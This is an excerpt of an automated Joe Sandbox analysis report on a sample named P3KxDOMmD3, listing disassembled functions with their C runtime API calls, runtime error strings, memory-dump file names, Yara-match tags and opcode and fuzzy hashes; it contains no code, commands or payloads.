                                                                  • Instruction ID: 8c8005ec778b1d8b89afdaa8f366cc80ce98c81ac44c8c214e0d273334ccb7fd
                                                                  • Opcode Fuzzy Hash: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                                                                  • Instruction Fuzzy Hash: 1A711276B10B9487DB20CF61DA4875A7761FB59BA8F54822AEF08277E8DB7CC540C608
                                                                  APIs
                                                                  Strings
                                                                  • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                                                                  • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: QueryVirtual
                                                                  • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                  • API String ID: 1804819252-157664173
                                                                  • Opcode ID: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                                                                  • Instruction ID: 3b33824f85b17f90b3a42b000daced5dafaf341a27cace3064c240a44d9835c1
                                                                  • Opcode Fuzzy Hash: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                                                                  • Instruction Fuzzy Hash: C43106B3701A41A6EB128F12ED417593761B755BEAF48413AEF0C173A1EB3CD986C788
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: __set_app_type
                                                                  • String ID: 06E$P0E
                                                                  • API String ID: 1108511539-3978550416
                                                                  • Opcode ID: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                                                                  • Instruction ID: 4660481e8b01e839d5568f54d4753b0e48e28ce44faaa9a024d6f640f261ebc1
                                                                  • Opcode Fuzzy Hash: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                                                                  • Instruction Fuzzy Hash: C52180B5600A41C7D7149F25D85136A37A1B785B49F818037DB4967BF5CB7DC8C0CB18
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 001BECB1
                                                                    • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 001BECBC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID: B
                                                                  • API String ID: 1812809483-1255198513
                                                                  • Opcode ID: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                                                                  • Instruction ID: 4ab64148a078f30f592bfda4bf66d86ddaf9101564b499946e096a0180613029
                                                                  • Opcode Fuzzy Hash: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                                                                  • Instruction Fuzzy Hash: 31018472614B5486EB109F12D4447D9B6A1F7A9FE4F584325EF5817B95CF38C144CB00
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 0067F8B1
                                                                    • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0067F8BC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID: B
                                                                  • API String ID: 1812809483-1255198513
                                                                  • Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                                                                  • Instruction ID: 696ec82873bee636f2cfc17656ce8eca3729c8e3e8ee0a98847dae6747d9afc8
                                                                  • Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                                                                  • Instruction Fuzzy Hash: 9001ADB2620B4086DB109F12E440799B662FB98FE4FA88325AF5C07BA5CF38C141CB04
                                                                  APIs
                                                                  Strings
                                                                  • Unknown error, xrefs: 00401D2C
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-3474627141
                                                                  • Opcode ID: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                                                                  • Instruction ID: 59ce1e855a84c40590a6f1d7e5fdbb5789b26ea1a6d81feca49222ead83698e2
                                                                  • Opcode Fuzzy Hash: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                                                                  • Instruction Fuzzy Hash: 19016163918F88C3D6018F18E8003AA7331FB6E749F259316EF8C26565DB39D592C704
                                                                  APIs
                                                                  Strings
                                                                  • Overflow range error (OVERFLOW), xrefs: 00401D00
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-4064033741
                                                                  • Opcode ID: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                                                                  • Instruction ID: 80ece2abca5378ef05b9d519cef63ff07e16b40d1adb7ebcdaa7eeb16c026ebe
                                                                  • Opcode Fuzzy Hash: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                                                                  • Instruction Fuzzy Hash: 4FF06257858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                                                                  APIs
                                                                  Strings
                                                                  • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-2187435201
                                                                  • Opcode ID: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                                                                  • Instruction ID: 6c5864fbeb6c7f4b963c4697b524ad25517706f5afd63d8b54a146ff3f516c0f
                                                                  • Opcode Fuzzy Hash: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                                                                  • Instruction Fuzzy Hash: 48F06256858E8882D2029F1DE8003AB7331FB5E789F245316EF8D36155DB29D5828704
                                                                  APIs
                                                                  Strings
                                                                  • Total loss of significance (TLOSS), xrefs: 00401D20
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-4273532761
                                                                  • Opcode ID: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                                                                  • Instruction ID: fb67b1574da8526718952bc4acd2e4b2938ff38d259f1ca349d8fde6e4d57ddc
                                                                  • Opcode Fuzzy Hash: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                                                                  • Instruction Fuzzy Hash: 2BF06256858E8882D2029F1CE8003AB7331FB5E789F245316EF8D36555DF29D5828704
                                                                  APIs
                                                                  Strings
                                                                  • Argument domain error (DOMAIN), xrefs: 00401CE0
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-2713391170
                                                                  • Opcode ID: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                                                                  • Instruction ID: 19d1ab342afe3ad9ea86bf5e66ade9d92ee5eaa311f738746577795edc5800f2
                                                                  • Opcode Fuzzy Hash: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                                                                  • Instruction Fuzzy Hash: 5EF06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                                                                  APIs
                                                                  Strings
                                                                  • Partial loss of significance (PLOSS), xrefs: 00401CF0
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-4283191376
                                                                  • Opcode ID: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                                                                  • Instruction ID: 72b50771eb885944449533605f92bc4095f36d05608744bf9fda369d3d258743
                                                                  • Opcode Fuzzy Hash: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                                                                  • Instruction Fuzzy Hash: 49F06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                                                                  APIs
                                                                  Strings
                                                                  • Argument singularity (SIGN), xrefs: 00401C78
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-2468659920
                                                                  • Opcode ID: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                                                                  • Instruction ID: c7517851250d5d007e0f967f84f5791a1ac141f8cb5801964327b6ba23b519ec
                                                                  • Opcode Fuzzy Hash: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                                                                  • Instruction Fuzzy Hash: 8CF09056814F8882C202DF2CE8003AB7330FB4EB8DF249316EF8C3A155DF29D5828704
                                                                  APIs
                                                                  • calloc.LIBCMT ref: 001A116A
                                                                    • Part of subcall function 001CE208: _calloc_impl.LIBCMT ref: 001CE218
                                                                    • Part of subcall function 001CE208: _errno.LIBCMT ref: 001CE22B
                                                                    • Part of subcall function 001CE208: _errno.LIBCMT ref: 001CE235
                                                                  • free.LIBCMT ref: 001A12F3
                                                                  • free.LIBCMT ref: 001A12FD
                                                                  • free.LIBCMT ref: 001A130F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_calloc_implcalloc
                                                                  • String ID:
                                                                  • API String ID: 4000150058-0
                                                                  • Opcode ID: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                                                                  • Instruction ID: ef13a074418b6d296590a38f5d20f9b5ca4bc9d75961e5e567413d64bbd8a4b0
                                                                  • Opcode Fuzzy Hash: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                                                                  • Instruction Fuzzy Hash: 09C10C36608B859AD764CF65E88479EB7F4F789B88F10412AEB8D87B18DF38C555CB00
                                                                  APIs
                                                                  • calloc.LIBCMT ref: 00661D6A
                                                                    • Part of subcall function 0068EE08: _calloc_impl.LIBCMT ref: 0068EE18
                                                                    • Part of subcall function 0068EE08: _errno.LIBCMT ref: 0068EE2B
                                                                    • Part of subcall function 0068EE08: _errno.LIBCMT ref: 0068EE35
                                                                  • free.LIBCMT ref: 00661EF3
                                                                  • free.LIBCMT ref: 00661EFD
                                                                  • free.LIBCMT ref: 00661F0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_calloc_implcalloc
                                                                  • String ID:
                                                                  • API String ID: 4000150058-0
                                                                  • Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                                                                  • Instruction ID: 1a8b3b2cf1c52a6259925237e4e9cbc3425f2cca5b61c0d3a4cc04866f41f30a
                                                                  • Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                                                                  • Instruction Fuzzy Hash: 18C13B32608B848AD760CF65E88039E77B5F789B88F14412AEF8D87B18EF39C555CB00
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 001BA178
                                                                    • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                                                                    • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                                                                  • free.LIBCMT ref: 001BA2BF
                                                                  • free.LIBCMT ref: 001BA323
                                                                  • free.LIBCMT ref: 001BA32F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                  • String ID:
                                                                  • API String ID: 2761444284-0
                                                                  • Opcode ID: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                                                                  • Instruction ID: 186e246a70f57c853be465db647510dd0cca896556ffc241b6b8c2dc239f5aab
                                                                  • Opcode Fuzzy Hash: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                                                                  • Instruction Fuzzy Hash: 5D51003130074582DE28AF22E8507ED63E2FBA5BC0F984429EE4A17B65EF79C502C701
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 0067AD78
                                                                    • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                                                                    • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                                                                    • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                                                                  • free.LIBCMT ref: 0067AEBF
                                                                  • free.LIBCMT ref: 0067AF23
                                                                  • free.LIBCMT ref: 0067AF2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$AllocHeap_callnewhmalloc
                                                                  • String ID:
                                                                  • API String ID: 3531731211-0
                                                                  • Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                                                                  • Instruction ID: 4dfa9effe5ef590a14f708f6425d43e3cd84eb666ee08e0ad8d86dc367fc0050
                                                                  • Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                                                                  • Instruction Fuzzy Hash: D751007630064582DA98ABA2D4503AD7393FBC4B80F54893AEE0E27B56EF7DC515C706
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc
                                                                  • String ID:
                                                                  • API String ID: 2803490479-0
                                                                  • Opcode ID: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                                                                  • Instruction ID: 77d767e9024fda2d898012a813aef0076d0c7132e078364397b5c0eabe0b130c
                                                                  • Opcode Fuzzy Hash: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                                                                  • Instruction Fuzzy Hash: 2C41BE7670078087CB18DF66E4107AE77A1F796B84F458625FE2A47B08EF38DA06C700
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc
                                                                  • String ID:
                                                                  • API String ID: 2803490479-0
                                                                  • Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                                                                  • Instruction ID: 530ed90c7799d936ae7596f3242aec9e382011cf7b4911ccbaf5d58aa51a8d27
                                                                  • Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                                                                  • Instruction Fuzzy Hash: B541CA3230478087CB58DF66E411BAE73A2F784F88F548529EE6A87B05EF38D946C700
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$CurrentProcessfreemalloc
                                                                  • String ID:
                                                                  • API String ID: 1397824077-0
                                                                  • Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                                                                  • Instruction ID: e3c96e085606936993393d51645e5bd6fe23844c8dd89ffb8ca1b770db688147
                                                                  • Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                                                                  • Instruction Fuzzy Hash: 52418372314A8186DB64DB26E4417AF63A3FB857D8F00942AEF8E4BB49EF3DC5418704